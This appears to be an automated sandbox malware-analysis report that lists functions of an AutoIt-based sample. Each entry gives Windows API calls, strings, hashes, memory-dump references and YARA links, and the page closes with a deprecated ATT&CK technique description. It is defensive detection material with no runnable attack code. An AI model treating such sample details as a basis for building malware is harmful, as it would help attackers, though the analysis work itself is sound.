Opcode ID: c9a5d0496a2be449f96e4f2cff72f059beee0eb2de77e0a6b997001ea05e3cda
Instruction ID: ac7eb336fa2b1e8cf8fee5dc82333767696c0ee079a616171bb6a082b436ecf0
Opcode Fuzzy Hash: c9a5d0496a2be449f96e4f2cff72f059beee0eb2de77e0a6b997001ea05e3cda
Instruction Fuzzy Hash: 38318A71200614AADB109F68DC85BFB73F9FF49760F108669F9A9D71A0DB34AC91CB60

Function 00B028A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B0294C

Strings

0, xrefs: 00B0290A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 3fb775f2cc6b78f4c06008ffa5099bb6bebc5d3600a66ec93158c6280a617c44
Instruction ID: 34bb63cd091058b2aa2730d6a768684dc8355551855e4ae8c296bf0a9b964bf2
Opcode Fuzzy Hash: 3fb775f2cc6b78f4c06008ffa5099bb6bebc5d3600a66ec93158c6280a617c44
Instruction Fuzzy Hash: AB318231A003059FEB25CF98C989BAEBFF9EF45350F1440B9E985A61E1DB709948CB51

Function 00B139E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00B13A66

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 00B13A58
, $, xrefs: 00B13AA6

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 03f25caaa780ff8192b472dfb525185a1f68f01817aab451888219d7ff2f90ed
Instruction ID: ab8caf12615d8562649330a0ff610e73bd88cbd531fa271fba5b0a72c31dc3ca
Opcode Fuzzy Hash: 03f25caaa780ff8192b472dfb525185a1f68f01817aab451888219d7ff2f90ed
Instruction Fuzzy Hash: 19215031600219ABCF10EF64CD81AEE77F5AF49710F900494F945B7192EB34EA45CB65

Function 00B266D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B26761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B2676C

Strings

Combobox, xrefs: 00B2672E

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 0e3c7e2e8ac04d62951df01cd2ac647d824ac21227b6718ea8b993888d505840
Instruction ID: 3489fc45bb1d713bd9d34125b2709b80b4bc0ed472f30df2399c039542bc05c0
Opcode Fuzzy Hash: 0e3c7e2e8ac04d62951df01cd2ac647d824ac21227b6718ea8b993888d505840
Instruction Fuzzy Hash: E311B275200219AFEF218F54EC80EBB37AAEB58368F100569FD18972A0D671DC5197A0

Function 00B26C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91

GetWindowRect.USER32(00000000,?), ref: 00B26C71
GetSysColor.USER32(00000012), ref: 00B26C8B

Strings

static, xrefs: 00B26C4E

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 5bc4cc1d03d2d6644040004a751aff5120e73e3b432c12b0d9dae6825bbdfb26
Instruction ID: 49561f7227adf6a0254325d001407229b9a5b7e316bccd5905b2e0c3f6ab58cc
Opcode Fuzzy Hash: 5bc4cc1d03d2d6644040004a751aff5120e73e3b432c12b0d9dae6825bbdfb26
Instruction Fuzzy Hash: 1F21067251021AAFDB14DFA8DC45AFA7BF8FB08314F004669F999D3250DA35E8519B60

Function 00B26920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00B269A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B269B1

Strings

edit, xrefs: 00B26986

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: aeeb470548fdf8b9b852a2b08a032ee021745f9e10e50e27c9e51a4a0dcf761d
Instruction ID: 2aa309ce33921034fe887b5dbb7af16f9ab7a7078ea065d8f80ae4ba9c13a8bb
Opcode Fuzzy Hash: aeeb470548fdf8b9b852a2b08a032ee021745f9e10e50e27c9e51a4a0dcf761d
Instruction Fuzzy Hash: 9B11BC71100229ABEF108F64EC84EFB37A9EB09374F504764F9A8971E0CB35DC919BA0

Function 00B029AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B02A41

Strings

0, xrefs: 00B02A18

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 80e15c8661ea7dc4ff973d69329a2bc06010992dc34ed787a59cdb7b8907986b
Instruction ID: ed4e132ef474367fc80f24503fb6349103f85982f1c7d69b1d8da7d0c7e47ffb
Opcode Fuzzy Hash: 80e15c8661ea7dc4ff973d69329a2bc06010992dc34ed787a59cdb7b8907986b
Instruction Fuzzy Hash: 6E118E32A01124AADF35DB98D888BAA7BE8EB45350F1540A1E955A72D0DB70AD0ECB91

Function 00B121D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B1222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B12255

Strings

<local>, xrefs: 00B1221D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 597c6c95103c0bbb4d729df72e46a49ce1dca2b93ab425ca8afd74a11e3fe090
Instruction ID: c742ac1639f68ed35a5dd9c3a74351dd89532a3a58a856b489f4a9501b6c432d
Opcode Fuzzy Hash: 597c6c95103c0bbb4d729df72e46a49ce1dca2b93ab425ca8afd74a11e3fe090
Instruction Fuzzy Hash: 3D11E070501225BADB258F118CC4EFBFBE8FF06351F5082AAF90456000E2705DE5D6F0

Function 00B17D8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00B17DB3,?,00000000,?,?), ref: 00B1800D

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B17DB6
htons.WSOCK32(00000000,?,00000000), ref: 00B17DF3

Strings

255.255.255.255, xrefs: 00B17DCE

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: ebf465f300025c724abe7a5d0ab8a27614610a1976f5911560653be54302f35d
Instruction ID: e3ab9438357e4e809545313ad1dd88ab1294e3238942266225db46bcd7026f2c
Opcode Fuzzy Hash: ebf465f300025c724abe7a5d0ab8a27614610a1976f5911560653be54302f35d
Instruction Fuzzy Hash: 9311CE75644209ABCB20AFA4DC86FFEB3B5FF04320F6045AAFA115B2D1DF31AC518691

Function 00AF8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AF8E73

Strings

ComboBox, xrefs: 00AF8E12
ListBox, xrefs: 00AF8E3D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: af3b589a8049524e5b9529c8b11665126a848df242ca9e08d407a426e1f1a9f5
Instruction ID: a74edc93895e74cf5a9a0f8025bfdfef4c8f09d76019c2080f755d119cec1400
Opcode Fuzzy Hash: af3b589a8049524e5b9529c8b11665126a848df242ca9e08d407a426e1f1a9f5
Instruction Fuzzy Hash: 0A01F1B1B41219AB8B14EBE0CD459FE73A8EF06320B040A59F925572E1DF35980CC650

Function 00AF8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00AF8D6B

Strings

ComboBox, xrefs: 00AF8D0A
ListBox, xrefs: 00AF8D35

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 81aadbaecb1ad42a79800dc964d9d1fc7c59b435ec97aeba2d662903630adbd0
Instruction ID: d4001b72b45479612384053259c6045d222c722a4f3e8844e7af4630808a2dcf
Opcode Fuzzy Hash: 81aadbaecb1ad42a79800dc964d9d1fc7c59b435ec97aeba2d662903630adbd0
Instruction Fuzzy Hash: 4F01BCB1B4110DABCB15EBE0CA52AFF77A89F16340F100069B906672E1DF285A0CD6A1

Function 00AF8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00AF8DEE

Strings

ComboBox, xrefs: 00AF8D8F
ListBox, xrefs: 00AF8DBA

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: d5cd6d091ba08252f08f20811cfb3c8b67e724788a18f379a07ed79eaea86abf
Instruction ID: 1c251343ca22e2fbd5bd693aa3e8f5c3c233fc9834cb6ee85c0471671b221aad
Opcode Fuzzy Hash: d5cd6d091ba08252f08f20811cfb3c8b67e724788a18f379a07ed79eaea86abf
Instruction Fuzzy Hash: D7018FB1A41109A7DB15EBE4CA42AFF77A89F16340F104059B905672D2DF294E0CD6B1

Function 00B04F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B04F46
_wcscmp.LIBCMT ref: 00B04F58

Strings

#32770, xrefs: 00B04F52

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 82291c2e891632d0fb10f98571807b3a24d6ad1bc27cc4444c01eb91bfba8738
Instruction ID: 664663c049fd3bb8bfebee2e9d431ed9af526a4e329195df9315290d44f436d1
Opcode Fuzzy Hash: 82291c2e891632d0fb10f98571807b3a24d6ad1bc27cc4444c01eb91bfba8738
Instruction Fuzzy Hash: 12E09B3350022D2AD7209655AC45FA7F7ECDB55B61F010066FD04D7051D9609A4587D0

Function 00ADB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00ADB314: _memset.LIBCMT ref: 00ADB321

Part of subcall function 00AC0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ADB2F0,?,?,?,00AA100A), ref: 00AC0945

IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00ADB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00ADB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ADB2FE

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: fcdb14b526cf4663badfaa2451620c826b4ebf5e3ef11e6988617b8b1cf50aad
Instruction ID: f7e5bc4a7a70c16a95bfe9ae74ab08bcb2f8c250ee5941ef9e4caad510e5b310
Opcode Fuzzy Hash: fcdb14b526cf4663badfaa2451620c826b4ebf5e3ef11e6988617b8b1cf50aad
Instruction Fuzzy Hash: 9EE03970610701CBD7209F28D504B527AE4AF04744F01897DE446CB750EBB49405DBB1

Function 00AF7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AF7C82

Part of subcall function 00AC3358: _doexit.LIBCMT ref: 00AC3362

Strings

AutoIt, xrefs: 00AF7C76
Error allocating memory., xrefs: 00AF7C7B

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 994ced379a0794c0c68235093538bb28e66a27ee74fb1a55a7c38a31772827d3
Instruction ID: 62bfeabbfb66cd911d1b12c4c23665bd0826d64459d2dbbee20acfb6a70ad647
Opcode Fuzzy Hash: 994ced379a0794c0c68235093538bb28e66a27ee74fb1a55a7c38a31772827d3
Instruction Fuzzy Hash: E7D02B323C435836D11132E8BD07FDA35888F05B52F100465FF089E1E34DD1488141E4

Function 00AE1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00AE1775

Part of subcall function 00B1BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00AE195E,?), ref: 00B1BFFE
Part of subcall function 00B1BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B1C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00AE196D

Strings

WIN_XPe, xrefs: 00AE1788

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 43c559d0dcc766b9d41f23bf2eaf074fde993657f85b5893869d1ee4dcd0b2ca
Instruction ID: b8f80756633d4ed0f4f1c60f4587ed101416090a54644e806d5917f90b48e25f
Opcode Fuzzy Hash: 43c559d0dcc766b9d41f23bf2eaf074fde993657f85b5893869d1ee4dcd0b2ca
Instruction Fuzzy Hash: 66F0ED71800159DFDB25DB92C984BECBBF8BB08702F540095E102B3190DB754F85DF60

Function 00B25998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B259AE
PostMessageW.USER32(00000000), ref: 00B259B5

Part of subcall function 00B05244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B052BC

Strings

Shell_TrayWnd, xrefs: 00B259A7

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9e00685d47c9f55cb41eebc35fbe35f32461e0a03ad87dccedba38986470324d
Instruction ID: 226e48f0261ea9c0fa4dbbe51f9ae38d81c0d5059abd1c22513c5441d558a530
Opcode Fuzzy Hash: 9e00685d47c9f55cb41eebc35fbe35f32461e0a03ad87dccedba38986470324d
Instruction Fuzzy Hash: DBD0C9313803127AE675BB70AC0BFA76A65FF14B51F000875B645AB1E0DDE0A801CA54

Function 00B25964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B2596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B25981

Part of subcall function 00B05244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B052BC

Strings

Shell_TrayWnd, xrefs: 00B25967

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: bd8ad688ac635aa57277a70880ccb4240377774de87725fd34b8c0a0912d192d
Instruction ID: be2104957af48ba9d6004a7901183084c181153027ee97b361623c64d3ac1391
Opcode Fuzzy Hash: bd8ad688ac635aa57277a70880ccb4240377774de87725fd34b8c0a0912d192d
Instruction Fuzzy Hash: 13D0C931384312B6E675BB70AC1BFA76A65FF10B51F000875B649AB1E0DDE0A801CA54

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
